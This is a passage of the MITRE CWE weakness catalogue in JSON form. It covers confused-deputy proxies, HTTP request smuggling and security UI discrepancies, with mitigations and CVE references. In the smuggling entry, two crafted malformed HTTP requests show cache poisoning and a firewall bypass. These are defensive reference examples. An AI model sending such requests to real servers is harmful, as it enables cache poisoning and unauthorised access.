Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Observed_Examples, Theoretical_Notes"}]}},"441":{"attr":{"@_ID":"441","@_Name":"Unintended Proxy or Intermediary (\'Confused Deputy\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product\'s control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.","Extended_Description":{"xhtml:p":["If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product\'s system, not the attacker\'s system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker.","Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The product runs with different privileges or on a different system, or otherwise has different levels of access than the upstream component;","The attacker is prevented from making the request directly to the target; and","The attacker can create a request that the proxy does not explicitly intend to be forwarded on the behalf of the requester. Such a request might point to an unexpected hostname, port number, hardware IP, or service. Or, the request might be sent to an allowed service, but the request could contain disallowed directives, commands, or resources."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Confused Deputy","Description":"This weakness is sometimes referred to as the \\"Confused deputy\\" problem, in which an attacker misused the authority of one victim (the \\"confused deputy\\") when targeting another victim."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Hide Activities","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Enforce the use of strong mutual authentication mechanism between the two parties."},{"Phase":"Architecture and Design","Description":"Whenever a product is an intermediary or proxy for\\n                   transactions between two other components, the proxy core\\n                   should not drop the identity of the initiator of the\\n                   transaction. The immutability of the identity of the\\n                   initiator must be maintained and should be forwarded all the\\n                   way to the target."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A SoC contains a microcontroller (running ring-3\\n                     (least trusted ring) code), a Memory Mapped Input Output\\n                     (MMIO) mapped IP core (containing design-house secrets),\\n                     and a Direct Memory Access (DMA) controller, among several\\n                     other compute elements and peripherals. The SoC implements\\n                     access control to protect the registers in the IP core\\n                     (which registers store the design-house secrets) from\\n                     malicious, ring-3 (least trusted ring) code executing on\\n                     the microcontroller.  The DMA controller, however, is not\\n                     blocked off from accessing the IP core for functional\\n                     reasons.","Example_Code":[{"#text":"The code in ring-3 (least trusted ring) of the\\n                     microcontroller attempts to directly read the protected\\n                     registers in IP core through MMIO transactions. However,\\n                     this attempt is blocked due to the implemented access\\n                     control. Now, the microcontroller configures the DMA core\\n                     to transfer data from the protected registers to a memory\\n                     region that it has access to. The DMA core, which is\\n                     acting as an intermediary in this transaction, does not\\n                     preserve the identity of the microcontroller and, instead,\\n                     initiates a new transaction with its own identity. Since\\n                     the DMA core has access, the transaction (and hence, the\\n                     attack) is successful.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The DMA\\n                     core forwards this transaction with the identity of the\\n                     code executing on the microcontroller, which is the\\n                     original initiator of the end-to-end transaction. Now the\\n                     transaction is blocked, as a result of forwarding the\\n                     identity of the true initiator which lacks the permission\\n                     to access the confidential MMIO mapped IP core.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"The weakness here is that the intermediary or the\\n                     proxy agent did not ensure the immutability of the\\n                     identity of the microcontroller initiating the\\n                     transaction."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0017","Description":"FTP bounce attack. The design of the protocol allows an attacker to modify the PORT command to cause the FTP server to connect to other machines besides the attacker\'s.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017"},{"Reference":"CVE-1999-0168","Description":"RPC portmapper could redirect service requests from an attacker to another entity, which thinks the requests came from the portmapper.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0168"},{"Reference":"CVE-2005-0315","Description":"FTP server does not ensure that the IP address in a PORT command is the same as the FTP user\'s session, allowing port scanning by proxy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0315"},{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2001-1484","Description":"Bounce attack allows access to TFTP from trusted side.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1484"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unintended proxy/intermediary"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Proxied Trusted Channel"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"219"}},{"attr":{"@_CAPEC_ID":"465"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-432"}},{"attr":{"@_External_Reference_ID":"REF-1125"}}]},"Notes":{"Note":[{"#text":"This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target\'s resources that the attacker cannot directly obtain.","attr":{"@_Type":"Relationship"}},{"#text":"This could possibly be considered as an emergent resource.","attr":{"@_Type":"Maintenance"}},{"#text":"It could be argued that the \\"confused deputy\\" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, References, Relationship_Notes, Relationships, Theoretical_Notes, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-14","Modification_Comment":"Per Intel Corporation suggestion, added language to be inclusive to hardware: updated Demonstrative_Examples, Description, Extended_Description, Applicable_Platforms, Potential_Mitigation, Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships"}],"Previous_Entry_Name":{"#text":"Unintended Proxy/Intermediary","attr":{"@_Date":"2013-02-21"}}}},"443":{"attr":{"@_ID":"443","@_Name":"DEPRECATED: HTTP response splitting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-113.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): HTTP response splitting","attr":{"@_Date":"2021-07-20"}}}},"444":{"attr":{"@_ID":"444","@_Name":"Inconsistent Interpretation of HTTP Requests (\'HTTP Request Smuggling\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to \\"smuggle\\" a request to one device without the other device being aware of it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Non-Repudiation","Access Control"],"Impact":["Unexpected State","Hide Activities","Bypass Protection Mechanism"],"Note":"An attacker could create a request to exploit a number of weaknesses including 1) the request can trick the web server to associate a URL with another URLs webpage and caching the contents of the webpage (web cache poisoning attack), 2) the request can be structured to bypass the firewall protection mechanisms and gain unauthorized access to a web application, and 3) the request can invoke a script or a page that returns client credentials (similar to a Cross Site Scripting attack)."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433]."},{"Phase":"Implementation","Description":"Use only SSL communication."},{"Phase":"Implementation","Description":"Terminate the client session after each request."},{"Phase":"System Configuration","Description":"Turn all pages to non-cacheable."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage.","Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST http://www.website.com/foobar.html HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Content-Length: 44GET /poison.html HTTP/1.1Host: www.website.comBla: GET http://www.website.com/page_to_poison.html HTTP/1.1Host: www.website.comConnection: Keep-Alive","xhtml:br":["","","","","","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...try {} catch (Exception ex) {...}","xhtml:br":["","",""],"xhtml:i":"// Set up response writer object","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Enumeration contentLengthHeaders = request.getHeaders(\\"Content-Length\\");int count = 0;while (contentLengthHeaders.hasMoreElements()) {}if (count &gt; 1) {}else {}","xhtml:br":["","","","","","",""],"xhtml:i":"// check for multiple content length headers","xhtml:div":[{"#text":"count++;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// output error response"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// process request"}}]}}}}}}],"Body_Text":["When this request is sent to the proxy server, the proxy server parses the POST request in the first seven lines, and encounters the two \\"Content-Length\\" headers. The proxy server ignores the first header, so it assumes the request has a body of length 44 bytes. Therefore, it treats the data in the next three lines that contain exactly 44 bytes as the first request\'s body. The proxy then parses the last three lines which it treats as the client\'s second request.","The request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first \\"Content-Length\\" header and considers that the first POST request has no body, and the second request is the line with the first GET (note that the second GET is parsed by the web server as the value of the \\"Bla\\" header).","The requests the web server sees are \\"POST /foobar.html\\" and \\"GET /poison.html\\", so it sends back two responses with the contents of the \\"foobar.html\\" page and the \\"poison.html\\" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client \\"POST /foobar.html\\" and \\"GET /page_to_poison.html\\". If the response is cacheable, the proxy caches the contents of \\"poison.html\\" under the URL \\"page_to_poison.html\\", and the cache is poisoned! Any client requesting \\"page_to_poison.html\\" from the proxy would receive the \\"poison.html\\" page.","When a website includes both a proxy server and a web server some protection against this type of attack can be achieved by installing a web application firewall, or use a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable.","Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple \\"Content-Length\\" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below."]},{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system..","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST /page.asp HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Length: 49223zzz...zzz [\\"z\\" x 49152]POST /page.asp HTTP/1.0Connection: Keep-AliveContent-Length: 30POST /page.asp HTTP/1.0Bla: POST /page.asp?cmd.exe HTTP/1.0Connection: Keep-Alive","xhtml:br":["","","","","","","","","","","",""]}},"Body_Text":["When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of \\"z\\" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request.","Note that there is no CRLF after the \\"Bla: \\" header so the POST in the line is parsed as the value of the \\"Bla:\\" header. Although the line contains the pattern identified with a worm (\\"cmd.exe\\"), it is not blocked, since it is considered part of a header value. Therefore, \\"cmd.exe\\" is smuggled through the firewall.","When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected \\"Content-Type: application/x-www-form-urlencoded\\" header, and starts parsing the second request.","This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the \\"Bla:\\" header. And unlike the firewall, the web server processes the final POST as a separate third request and the \\"cmd.exe\\" worm is smuggled through the firewall to the web server.","To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2088","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2088"},{"Reference":"CVE-2005-2089","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2089"},{"Reference":"CVE-2005-2090","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090"},{"Reference":"CVE-2005-2091","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2091"},{"Reference":"CVE-2005-2092","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2092"},{"Reference":"CVE-2005-2093","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2093"},{"Reference":"CVE-2005-2094","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2094"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP Request Smuggling"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":26,"Entry_Name":"HTTP Request Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"105"}},{"attr":{"@_CAPEC_ID":"33"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-433"}}},"Notes":{"Note":{"#text":"Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"HTTP Request Smuggling","attr":{"@_Date":"2008-04-11"}},{"#text":"Interpretation Conflict in Web Traffic (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Inconsistent Interpretation of HTTP Requests (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2009-05-27"}}]}},"446":{"attr":{"@_ID":"446","@_Name":"UI Discrepancy for Security Feature","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state.","Extended_Description":"When the user interface does not properly reflect what the user asks of it, then it can lead the user into a false sense of security. For example, the user might check a box to enable a security option to enable encrypted communications, but the software does not actually enable the encryption. Alternately, the user might provide a \\"restrict ALL\'\\" access control rule, but the software only implements \\"restrict SOME\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1446","Description":"UI inconsistency; visited URLs list not cleared when \\"Clear History\\" option is selected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1446"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User interface inconsistency"}},"Notes":{"Note":{"#text":"This entry is likely a loose composite that could be broken down into the different types of errors that cause the user interface to have incorrect interactions with the underlying security feature.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationship_Notes, Weakness_Ordinalities"}],"Previous_Entry_Name":[{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-01-30"}},{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-04-11"}}]}},"447":{"attr":{"@_ID":"447","@_Name":"Unimplemented or Unsupported Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform functionality testing before deploying the application."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0127","Description":"GUI configuration tool does not enable a security option when a checkbox is selected, although that option is honored when manually set in the configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127"},{"Reference":"CVE-2001-0863","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0863"},{"Reference":"CVE-2001-0865","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0865"},{"Reference":"CVE-2004-0979","Description":"Web browser does not properly modify security setting when the user sets it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unimplemented or unsupported feature in UI"}},"Notes":{"Note":{"#text":"This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"448":{"attr":{"@_ID":"448","@_Name":"Obsolete Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function is obsolete and the product does not warn the 